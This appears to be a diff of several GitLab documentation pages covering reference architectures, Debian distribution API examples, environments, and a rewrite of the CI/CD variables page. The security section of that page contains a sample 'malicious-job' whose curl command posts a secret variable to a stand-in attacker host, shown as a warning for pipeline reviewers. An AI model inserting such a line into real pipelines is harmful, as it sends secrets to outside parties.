CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus GitLab environments,
ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As general guidance, GitLab should run on most infrastructure such as reputable Cloud Providers (AWS, GCP, Azure) and
their services, or self-managed solutions (ESXi), that meet both:
- The specifications detailed in each reference architecture.
- Any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
These reference architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab
setups with good headroom in mind to cover most scenarios. However, if any additional workloads are being added on the
nodes, such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies for some GitLab features where it's possible to run custom scripts, for example
[server hooks](../server_hooks.md).
As a general rule, you should have robust monitoring in place to measure the impact of any additional workloads and to
inform any changes that need to be made.
### No swap
Swap is not recommended in the reference architectures. It's a failsafe that impacts performance greatly. The
reference architectures are designed to have memory headroom to avoid needing swap.
### Large repositories
The relevant reference architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git, and in turn the environment itself, if best practices aren't being followed, such as not storing binary or blob
files in LFS.
Repositories are at the core of any environment and the consequences can be wide-ranging when they are not optimized.
Some examples of this impact include:
- [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles) taking longer and consuming high CPU
and memory resources.
- Git checkouts taking longer, which affects both users and CI/CD pipelines alike.
As such, large repositories come with notable cost and typically require more resources to handle (significantly more
in some cases). You should review large repositories to ensure they maintain good health and reduce their size wherever
possible.
NOTE:
If best practices aren't followed and large repositories are present on the environment, increased Gitaly specs may be
required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
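To gauge whether a repository needs attention, a quick read-only check can be run from the repository path on a
Gitaly node. This is a minimal sketch using standard Git plumbing commands; the five-entry cutoff is arbitrary:

```shell
# Show object counts and total on-disk pack size for the repository
git count-objects -vH

# List the five largest blobs; large binaries are candidates for moving to LFS
git rev-list --objects --all |
  git cat-file --batch-check='%(objecttype) %(objectname) %(objectsize) %(rest)' |
  awk '$1 == "blob"' |
  sort -k 3 -n -r |
  head -n 5
```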
### Praefect PostgreSQL
[Praefect requires its own database server](../gitaly/praefect.md#postgresql), and
to achieve full High Availability, a third-party PostgreSQL database solution is required.
We hope to offer a built-in solution for these restrictions in the future but, in the meantime, a non-HA PostgreSQL server
can be set up using Omnibus GitLab, which the specifications above reflect. Refer to the following issues for more information:
- [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919).
- [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
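For illustration only, pointing Praefect at an external PostgreSQL server with Omnibus GitLab looks roughly like the
following in `/etc/gitlab/gitlab.rb`. The attribute names follow the [Praefect documentation](../gitaly/praefect.md#postgresql);
the host, user, and password values are placeholders:

```ruby
# Praefect node: connect to an external PostgreSQL database (placeholder values)
praefect['database_host'] = 'praefect-db.internal'
praefect['database_port'] = 5432
praefect['database_user'] = 'praefect'
praefect['database_password'] = 'PRAEFECT_SQL_PASSWORD'
praefect['database_dbname'] = 'praefect_production'
```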
## Recommended cloud providers and services
NOTE:

View File

@ -21232,6 +21232,7 @@ Represents vulnerability letter grades with associated projects.
| Name | Type | Description |
| ---- | ---- | ----------- |
| <a id="workitemauthor"></a>`author` **{warning-solid}** | [`UserCore`](#usercore) | **Introduced** in 15.9. This feature is in Alpha. It can be changed or removed at any time. User that created the work item. |
| <a id="workitemclosedat"></a>`closedAt` | [`Time`](#time) | Timestamp of when the work item was closed. |
| <a id="workitemconfidential"></a>`confidential` | [`Boolean!`](#boolean) | Indicates the work item is confidential. |
| <a id="workitemcreatedat"></a>`createdAt` | [`Time!`](#time) | Timestamp of when the work item was created. |

View File

@ -50,7 +50,7 @@ Example response:
[
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -90,7 +90,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -166,7 +166,7 @@ POST /groups/:id/debian_distributions
| `architectures` | architectures | no | The new Debian distribution's list of architectures. |
```shell
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions?codename=unstable"
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/debian_distributions?codename=sid"
```
Example response:
@ -174,7 +174,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -221,7 +221,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": "new-suite",
"origin": null,
"label": null,

View File

@ -49,7 +49,7 @@ Example response:
[
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -89,7 +89,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -165,7 +165,7 @@ POST /projects/:id/debian_distributions
| `architectures` | architectures | no | The new Debian distribution's list of architectures. |
```shell
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions?codename=unstable"
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/5/debian_distributions?codename=sid"
```
Example response:
@ -173,7 +173,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": null,
"origin": null,
"label": null,
@ -220,7 +220,7 @@ Example response:
```json
{
"id": 1,
"codename": "unstable",
"codename": "sid",
"suite": "new-suite",
"origin": null,
"label": null,

View File

@ -1,5 +1,5 @@
---
status: proposed
status: ongoing
creation-date: "2021-02-07"
authors: [ "@alexpooley", "@ifarkas" ]
coach: "@grzesiek"

View File

@ -62,11 +62,17 @@ To search environments by name:
## Types of environments
There are two types of environments:
An environment is either static or dynamic:
- Static environments have static names, like `staging` or `production`.
- Dynamic environments have dynamic names. Dynamic environments
are a fundamental part of [Review apps](../review_apps/index.md).
- Static environment
- Usually reused by successive deployments.
- Has a static name - for example, `staging` or `production`.
- Created manually or as part of a CI/CD pipeline.
- Dynamic environment
- Usually created in a CI/CD pipeline and used by only a single deployment, then either stopped or
deleted.
- Has a dynamic name, usually based on the value of a CI/CD variable.
- A feature of [review apps](../review_apps/index.md).
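For illustration, here is a minimal sketch of one static and one dynamic environment in `.gitlab-ci.yml`. The job
names and the review URL pattern are hypothetical:

```yaml
deploy-production:
  stage: deploy
  script:
    - echo "Deploy to production"
  environment:
    name: production                       # static name, reused by every deployment

deploy-review:
  stage: deploy
  script:
    - echo "Deploy a review app"
  environment:
    name: review/$CI_COMMIT_REF_SLUG       # dynamic name from a predefined CI/CD variable
    url: https://$CI_COMMIT_REF_SLUG.example.com
```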
### Create a static environment

View File

@ -145,7 +145,7 @@ To execute a pipeline manually:
1. On the left sidebar, select **CI/CD > Pipelines**.
1. Select **Run pipeline**.
1. In the **Run for branch name or tag** field, select the branch or tag to run the pipeline for.
1. Enter any [environment variables](../variables/index.md) required for the pipeline to run.
1. Enter any [CI/CD variables](../variables/index.md) required for the pipeline to run.
You can set specific variables to have their [values prefilled in the form](#prefill-variables-in-manual-pipelines).
1. Select **Run pipeline**.

View File

@ -84,3 +84,4 @@ In SaaS runners on macOS, the objective is to make 90% of CI jobs start executin
- If the VM image does not include the specific software version you need for your job, then the job execution time will increase as the required software needs to be fetched and installed.
- At this time, it is not possible to bring your own OS image.
- The keychain for user `gitlab` is not publicly available. You must create a keychain instead.
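As a rough sketch, a job script can create and unlock its own keychain with the standard macOS `security` tool. The
keychain name and password here are placeholders:

```shell
# Create a temporary keychain, make it the default, and unlock it for the job
KEYCHAIN_PASSWORD="temporary-ci-password"  # placeholder value
security create-keychain -p "$KEYCHAIN_PASSWORD" build.keychain
security default-keychain -s build.keychain
security unlock-keychain -p "$KEYCHAIN_PASSWORD" build.keychain
```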

View File

@ -197,7 +197,7 @@ to learn more about how to define one.
To disable Code Quality, create a custom CI/CD variable named `CODE_QUALITY_DISABLED`, for either:
- [The whole project](../variables/index.md#for-a-project).
- [A single pipeline](../variables/index.md#override-a-variable-when-running-a-pipeline-manually).
- [A single pipeline](../pipelines/index.md#run-a-pipeline-manually).
## Customizing scan settings

View File

@ -13,20 +13,12 @@ CI/CD variables are a type of environment variable. You can use them to:
- Store values you want to re-use.
- Avoid hard-coding values in your `.gitlab-ci.yml` file.
You can use:
- [Predefined CI/CD variables](#predefined-cicd-variables).
- [Variables defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
- [Variables defined in project, group, or instance settings](#define-a-cicd-variable-in-the-ui).
You can [override variable values manually for a specific pipeline](../jobs/index.md#specifying-variables-when-running-manual-jobs),
or have them [prefilled in manual pipelines](../pipelines/index.md#prefill-variables-in-manual-pipelines).
Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/index.html)
to execute scripts. Each shell has its own set of reserved variable names.
Make sure each variable is defined for the [scope you want to use it in](where_variables_can_be_used.md).
> For more information about advanced use of GitLab CI/CD:
>
> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i>&nbsp;Get to productivity faster with these [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/)
@ -37,97 +29,113 @@ Make sure each variable is defined for the [scope you want to use it in](where_v
## Predefined CI/CD variables
GitLab CI/CD makes a set of [predefined CI/CD variables](predefined_variables.md)
available for use in pipeline configuration and job scripts. You can use predefined CI/CD variables
in your `.gitlab-ci.yml` without declaring them first.
available for use in pipeline configuration and job scripts. These variables contain
information about the job, pipeline, and other values you might need when the pipeline
is triggered or running.
You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first.
For example:
```yaml
job1:
stage: test
script:
- echo "$CI_JOB_STAGE"
- echo "The job's stage is '$CI_JOB_STAGE'"
```
The script in this example outputs the stage for the `job1` job, which is `test`.
The script in this example outputs `The job's stage is 'test'`.
## Define a CI/CD variable in the `.gitlab-ci.yml` file
To create a custom variable in the [`.gitlab-ci.yml`](../yaml/index.md#variables) file,
define the variable and value with `variables` keyword.
To create a CI/CD variable in the `.gitlab-ci.yml` file, define the variable and
value with the [`variables`](../yaml/index.md#variables) keyword.
You can use the `variables` keyword in a job or at the top level of the `.gitlab-ci.yml` file.
If the variable is at the top level, it's globally available and all jobs can use it.
If it's defined in a job, only that job can use it.
Variables saved in the `.gitlab-ci.yml` file are visible to all users with access to
the repository, and should store only non-sensitive project configuration. For example,
the URL of a database saved in a `DATABASE_URL` variable. Sensitive variables containing values
like secrets or keys should be [stored in project settings](#define-a-cicd-variable-in-the-ui).
You can use `variables` in a job or at the top level of the `.gitlab-ci.yml` file.
If the variable is defined:
- At the top level, it's globally available and all jobs can use it.
- In a job, only that job can use it.
For example:
```yaml
variables:
TEST_VAR: "All jobs can use this variable's value"
GLOBAL_VAR: "A global variable"
job1:
variables:
TEST_VAR_JOB: "Only job1 can use this variable's value"
JOB_VAR: "A job variable"
script:
- echo "$TEST_VAR" and "$TEST_VAR_JOB"
- echo "Variables are '$GLOBAL_VAR' and '$JOB_VAR'"
job2:
script:
- echo "Variables are '$GLOBAL_VAR' and '$JOB_VAR'"
```
Variables saved in the `.gitlab-ci.yml` file should store only non-sensitive project
configuration, like a `RAILS_ENV` or `DATABASE_URL` variable. These variables are
visible in the repository. Store sensitive variables containing values like secrets or keys
in project settings.
In this example:
Variables saved in the `.gitlab-ci.yml` file are also available in [service containers](../docker/using_docker_images.md).
- `job1` outputs `Variables are 'A global variable' and 'A job variable'`
- `job2` outputs `Variables are 'A global variable' and ''`
Use the [`value` and `description`](../yaml/index.md#variablesdescription) keywords
to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines)
for [manually-triggered pipelines](../pipelines/index.md#run-a-pipeline-manually).
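For example, a sketch of a prefilled variable (the name, value, and description are hypothetical):

```yaml
variables:
  DEPLOY_ENVIRONMENT:
    value: "staging"
    description: "The deployment target. Change to 'production' to release to production."
```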
### Skip global variables in a single job
If you don't want globally defined variables to be available in a job, set `variables`
to `{}`:
```yaml
variables:
GLOBAL_VAR: "A global variable"
job1:
variables: {}
script:
- echo This job does not need any variables
```
Use the [`value` and `description`](../yaml/index.md#variablesdescription)
keywords to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines)
for [manually-triggered pipelines](../pipelines/index.md#run-a-pipeline-manually).
## Define a CI/CD variable in the UI
You can define CI/CD variables in the UI:
Sensitive variables like tokens or passwords should be stored in the settings in the UI,
not [in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
Define CI/CD variables in the UI:
- For a project:
- [In the project's settings](#for-a-project).
- [With the API](../../api/project_level_variables.md).
- For a project [in the project's settings](#for-a-project).
- For all projects in a group [in the group's setting](#for-a-group).
- For all projects in a GitLab instance [in the instance's settings](#for-an-instance).
By default, pipelines from forked projects can't access CI/CD variables in the parent project.
Alternatively, these variables can be added by using the API:
- [With the project-level variables API endpoint](../../api/project_level_variables.md).
- [With the group-level variables API endpoint](../../api/group_level_variables.md).
- [With the instance-level variables API endpoint](../../api/instance_level_ci_variables.md).
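For example, a minimal sketch of adding a project variable with the project-level endpoint (the key and value shown
are placeholders):

```shell
curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \
     "https://gitlab.example.com/api/v4/projects/5/variables" \
     --form "key=DEPLOY_ENV" --form "value=staging"
```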
By default, pipelines from forked projects can't access the CI/CD variables available to the parent project.
If you [run a merge request pipeline in the parent project for a merge request from a fork](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project),
all variables become available to the pipeline.
Variables set in the GitLab UI are **not** passed down to [service containers](../docker/using_docker_images.md).
To set them, assign them to variables in the UI, then re-assign them in your `.gitlab-ci.yml`:
```yaml
variables:
SA_PASSWORD: $SA_PASSWORD
```
### For a project
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/362227) in GitLab 15.7, projects can define a maximum of 200 CI/CD variables.
You can add CI/CD variables to a project's settings. Only project members with the
Maintainer role
can add or update project CI/CD variables. To keep a CI/CD variable secret, put it
in the project settings, not in the `.gitlab-ci.yml` file.
You can add CI/CD variables to a project's settings.
Prerequisite:
- You must be a project member with the Maintainer role.
To add or update variables in the project settings:
1. Go to your project's **Settings > CI/CD** and expand the **Variables** section.
1. Select **Add variable** and fill in the details:
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
- **Value**: No limitations.
- **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
@ -146,19 +154,16 @@ or in [job scripts](#use-cicd-variables-in-job-scripts).
> - Support for environment scopes [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/2874) in GitLab Premium 13.11
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/362227) in GitLab 15.7, groups can define a maximum of 200 CI/CD variables.
To make a CI/CD variable available to all projects in a group, define a group CI/CD variable.
You must be a group owner.
You can make a CI/CD variable available to all projects in a group.
Use group variables to store secrets like passwords, SSH keys, and credentials, if you:
Prerequisite:
- Do not use an external key store.
- Use the GitLab [integration with HashiCorp Vault](../secrets/index.md).
- You must be a group member with the Owner role.
To add a group variable:
1. In the group, go to **Settings > CI/CD**.
1. Select **Add variable** and fill in the details:
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
- **Value**: No limitations.
- **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables).
@ -178,17 +183,17 @@ are recursively inherited.
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14108) in GitLab 13.0.
> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/299879) in GitLab 13.11.
To make a CI/CD variable available to all projects and groups in a GitLab instance,
add an instance CI/CD variable. You must have administrator access.
You can make a CI/CD variable available to all projects and groups in a GitLab instance.
You can define instance variables via the UI or [API](../../api/instance_level_ci_variables.md).
Prerequisite:
- You must have administrator access.
To add an instance variable:
1. On the top bar, select **Main menu > Admin**.
1. On the left sidebar, select **Settings > CI/CD** and expand the **Variables** section.
1. Select **Add variable** and fill in the details:
- **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`.
- **Value**: In [GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/220028),
the value is limited to 10,000 characters, but also bounded by any limits in the
@ -204,10 +209,8 @@ The instance variables that are available in a project are listed in the project
## CI/CD variable security
Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables
and send them to a third party server regardless of the masked setting. If the pipeline
runs on a [protected branch](../../user/project/protected_branches.md) or
[protected tag](../../user/project/protected_tags.md), malicious code can compromise protected variables.
Code pushed to the `.gitlab-ci.yml` file could compromise your variables. Variables could
be accidentally exposed in a job log, or maliciously sent to a third party server.
Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you:
@ -219,11 +222,27 @@ Review the `.gitlab-ci.yml` file of imported projects before you add files or ru
The following example shows malicious code in a `.gitlab-ci.yml` file:
```yaml
build:
script:
accidental-leak-job:
script: # Password exposed accidentally
- echo "This script logs into the DB with $USER $PASSWORD"
- db-login $USER $PASSWORD
malicious-job:
script: # Secret exposed maliciously
- curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"
```
To help reduce the risk of accidentally leaking secrets through scripts like in `accidental-leak-job`,
all variables containing sensitive information should be [masked in job logs](#mask-a-cicd-variable).
You can also [limit a variable to protected branches and tags only](#protect-a-cicd-variable).
Alternatively, use the GitLab [integration with HashiCorp Vault](../secrets/index.md)
to store and retrieve secrets.
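For reference, here is a sketch of reading a secret with the [`secrets`](../yaml/index.md#secrets) keyword, assuming the
Vault integration is already configured. The path and field names are hypothetical:

```yaml
job-with-secret:
  script:
    - echo "The secret is available to the script as a CI/CD variable"
  secrets:
    DATABASE_PASSWORD:                    # file type CI/CD variable by default
      vault: production/db/password@ops   # field `password` at path `production/db` in the `ops` engine
```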
Malicious scripts like in `malicious-job` must be caught during the review process.
Reviewers should never trigger a pipeline when they find code like this, because
malicious code can compromise both masked and protected variables.
Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard)
and stored in the database. This data can only be read and decrypted with a
valid [secrets file](../../raketasks/backup_restore.md#when-the-secrets-file-is-lost).
@ -232,9 +251,20 @@ valid [secrets file](../../raketasks/backup_restore.md#when-the-secrets-file-is-
> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/330650) in GitLab 13.12, the `~` character can be used in masked variables.
WARNING:
Masking a CI/CD variable is not a guaranteed way to prevent malicious users from
accessing variable values. The masking feature is "best-effort" and there to
help when a variable is accidentally revealed. To make variables more secure,
consider using [external secrets](../secrets/index.md) and [file type variables](#use-file-type-cicd-variables)
to prevent commands such as `env`/`printenv` from printing secret variables.
You can mask a project, group, or instance CI/CD variable so the value of the variable
does not display in job logs.
Prerequisite:
- You must have the same role or access level as required to [define a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).
To mask a variable:
1. In the project, group, or Admin Area, go to **Settings > CI/CD**.
@ -252,21 +282,13 @@ The value of the variable must:
- The `@`, `:`, `.`, or `~` characters.
- Not match the name of an existing predefined or custom CI/CD variable.
WARNING:
Masking a CI/CD variable is not a guaranteed way to prevent malicious users from
accessing variable values. The masking feature is "best-effort" and there to
help when a variable is accidentally revealed. To make variables more secure,
consider using [external secrets](../secrets/index.md) and [file type variables](#use-file-type-cicd-variables)
to prevent commands such as `env`/`printenv` from printing secret variables.
Different versions of [GitLab Runner](../runners/index.md) have different masking limitations:
Runner versions implement masking in different ways, some with technical
limitations. Below is a table of such limitations.
| Version from | Version to | Limitations |
| ------------ | ---------- | ------ |
| v11.9.0 | v14.1.0 | Masking of large secrets (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v14.2.0 | v15.3.0 | The tail of a large secret (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v15.7.0 | | Potential for secrets to be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/index.md#capturing-service-container-logs). |
| Version | Limitations |
| ------------------- | ----------- |
| v14.1.0 and earlier | Masking of large secrets (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v14.2.0 to v15.3.0 | The tail of a large secret (greater than 4 KiB) could potentially be [revealed](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28128). No sensitive URL parameter masking. |
| v15.7.0 and later | Secrets could be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/index.md#capturing-service-container-logs). |
### Protect a CI/CD variable
@ -276,11 +298,14 @@ or [protected tags](../../user/project/protected_tags.md).
[Merged results pipelines](../pipelines/merged_results_pipelines.md), which run on a
temporary merge commit, not a branch or tag, do not have access to these variables.
[Merge request pipelines](../pipelines/merge_request_pipelines.md), which do not use
a temporary merge commit, can access these variables if the branch is a protected branch.
Pipelines that run directly on the merge request's source branch, with no added merge commit, can access
these variables if the source branch is a protected branch.
Prerequisite:
To mark a variable as protected:
- You must have the same role or access level as required to [define a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).
To set a variable as protected:
1. Go to **Settings > CI/CD** in the project, group or instance Admin Area.
1. Expand the **Variables** section.
@ -293,36 +318,35 @@ The variable is available for all subsequent pipelines.
### Use file type CI/CD variables
All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file
are `Variable` type. Project, group and instance CI/CD variables can be `Variable`
or `File` type.
`Variable` type variables:
are "variable" type ([`variable_type` of `env_var` in the API](#define-a-cicd-variable-in-the-ui)).
Variable type variables:
- Consist of a key and value pair.
- Are made available in jobs as environment variables, with:
- The CI/CD variable key as the environment variable name.
- The CI/CD variable value as the environment variable value.
Use `File` type CI/CD variables for tools that need a file as input.
Project, group, and instance CI/CD variables are "variable" type by default, but can
optionally be set as a "file" type ([`variable_type` of `file` in the API](#define-a-cicd-variable-in-the-ui)).
File type variables:
`File` type variables:
- Consist of a key, value and file.
- Are made available in jobs as environment variables, with
- Consist of a key, value, and file.
- Are made available in jobs as environment variables, with:
- The CI/CD variable key as the environment variable name.
- The CI/CD variable value saved to a temporary file.
- The path to the temporary file as the environment variable value.
Some tools like [the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html)
Use file type CI/CD variables for tools that need a file as input. [The AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html)
and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable)
use `File` type variables for configuration.
are both tools that use `File` type variables for configuration.
For example, if you have the following variables:
For example, if you are using `kubectl` with:
- A variable of type `Variable`: `KUBE_URL` with the value `https://example.com`.
- A variable of type `File`: `KUBE_CA_PEM` with a certificate as the value.
- A variable with a key of `KUBE_URL` and `https://example.com` as the value.
- A file type variable with a key of `KUBE_CA_PEM` and a certificate as the value.
Use the variables in a job script like this:
Pass `KUBE_URL` as a `--server` option, which accepts a variable, and pass `$KUBE_CA_PEM`
as a `--certificate-authority` option, which accepts a path to a file:
```shell
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM"
@ -331,19 +355,27 @@ kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KU
WARNING:
Be careful when assigning the value of a file variable to another variable. The other
variable takes the content of the file as its value, **not** the path to the file.
See [issue 29407](https://gitlab.com/gitlab-org/gitlab/-/issues/29407) for more details.
[Issue 29407](https://gitlab.com/gitlab-org/gitlab/-/issues/29407) proposes to change this behavior.
An alternative to `File` type variables is to:
#### Use a `.gitlab-ci.yml` variable as a file type variable
- Read the value of a CI/CD variable (`variable` type).
- Save the value in a file.
- Use that file in your script.
You cannot set a CI/CD variable [defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file)
as a file type variable. If you have a tool that requires a file path as an input,
but you want to use a variable defined in the `.gitlab-ci.yml`:
```shell
# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file
echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem"
# Pass the newly created file to kubectl
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem"
- Run a command that saves the value of the variable in a file.
- Use that file with your tool.
For example:
```yaml
variables:
SITE_URL: "https://example.gitlab.com"
job:
script:
- echo "$SITE_URL" > "site-url.txt"
- mytool --url-file="site-url.txt"
```
## Use CI/CD variables in job scripts
@ -368,7 +400,7 @@ job_name:
### With PowerShell
To access variables in a Windows PowerShell environment, including environment
variables set by the system, prefix the variable name with (`$env:`) or (`$`):
variables set by the system, prefix the variable name with `$env:` or `$`:
```yaml
job_name:
@ -389,8 +421,7 @@ job_name:
### With Windows Batch
To access CI/CD variables in Windows Batch, surround the variable
with `%`:
To access CI/CD variables in Windows Batch, surround the variable with `%`:
```yaml
job_name:
@ -399,7 +430,7 @@ job_name:
```
You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html).
Delayed expansion might be needed for variables that contain white spaces or newlines.
Delayed expansion might be needed for variables that contain white spaces or newlines:
```yaml
job_name:
@ -407,29 +438,43 @@ job_name:
- echo !ERROR_MESSAGE!
```
### In service containers
[Service containers](../docker/using_docker_images.md) can use CI/CD variables, but
by default can only access [variables saved in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file).
Variables [set in the GitLab UI](#define-a-cicd-variable-in-the-ui) by default are not available to
service containers. To make a UI-defined variable available in a service container,
re-assign it in your `.gitlab-ci.yml`:
```yaml
variables:
SA_PASSWORD_YAML_FILE: $SA_PASSWORD_UI
```
### Pass an environment variable to another job
> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22638) in GitLab 13.0.
> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/217834) in GitLab 13.1.
You can pass environment variables from one job to another job in a later stage
through variable inheritance.
These variables cannot be used as CI/CD variables to configure a pipeline, but
they can be used in job scripts.
You can create a new environment variable in a job, and pass it to another job
in a later stage. These variables cannot be used as CI/CD variables to configure a pipeline,
but they can be used in job scripts.
To pass a job-created environment variable to other jobs:
1. In the job script, save the variable as a `.env` file.
- The format of the file must be one variable definition per line.
- Each defined line must be of the form `VARIABLE_NAME=ANY VALUE HERE`.
- Each line must be formatted as: `VARIABLE_NAME=ANY VALUE HERE`.
- Values can be wrapped in quotes, but cannot contain newline characters.
1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/artifacts_reports.md#artifactsreportsdotenv)
artifact.
1. Jobs in later stages can then [use the variable in scripts](#use-cicd-variables-in-job-scripts).
Inherited variables [take precedence](#cicd-variable-precedence) over
certain types of new variable definitions, such as job-defined variables.
For example:
```yaml
build:
build-job:
stage: build
script:
- echo "BUILD_VARIABLE=value_from_build_job" >> build.env
@ -437,92 +482,95 @@ build:
reports:
dotenv: build.env
deploy:
stage: deploy
variables:
BUILD_VARIABLE: value_from_deploy_job
test-job:
stage: test
script:
- echo "$BUILD_VARIABLE" # Output is: 'value_from_build_job' due to precedence
environment: production
- echo "$BUILD_VARIABLE" # Output is: 'value_from_build_job'
```
The [`dependencies`](../yaml/index.md#dependencies) or
[`needs`](../yaml/index.md#needs) keywords can be used to control
which jobs receive inherited values.
Variables from `dotenv` reports [take precedence](#cicd-variable-precedence) over
certain types of new variable definitions, such as job-defined variables.
To have no inherited dotenv environment variables, pass an empty `dependencies` or
`needs` list, or pass [`needs:artifacts`](../yaml/index.md#needsartifacts) as `false`
You can also [pass `dotenv` variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job).
#### Control which jobs receive `dotenv` variables
You can use the [`dependencies`](../yaml/index.md#dependencies) or [`needs`](../yaml/index.md#needs)
keywords to control which jobs receive the `dotenv` artifacts.
To have no environment variables from a `dotenv` artifact:
- Pass an empty `dependencies` or `needs` array.
- Pass [`needs:artifacts`](../yaml/index.md#needsartifacts) as `false`.
- Set `needs` to only list jobs that do not have a `dotenv` artifact.
For example:
```yaml
build:
build-job1:
stage: build
script:
- echo "BUILD_VERSION=hello" >> build.env
- echo "BUILD_VERSION=v1.0.0" >> build.env
artifacts:
reports:
dotenv: build.env
deploy_one:
stage: deploy
build-job2:
stage: build
needs: []
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
- echo "This job has no dotenv artifacts"
test-job1:
stage: test
script:
- echo "$BUILD_VERSION" # Output is: 'v1.0.0'
dependencies:
- build
environment:
name: customer1
deployment_tier: production
deploy_two:
stage: deploy
test-job2:
stage: test
script:
- echo "$BUILD_VERSION" # Output is empty
- echo "$BUILD_VERSION" # Output is ''
dependencies: []
environment:
name: customer2
deployment_tier: production
deploy_three:
stage: deploy
test-job3:
stage: test
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
- echo "$BUILD_VERSION" # Output is: 'v1.0.0'
needs:
- build
environment:
name: customer3
deployment_tier: production
- build-job1
deploy_four:
stage: deploy
test-job4:
stage: test
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
- echo "$BUILD_VERSION" # Output is: 'v1.0.0'
needs:
- job: build
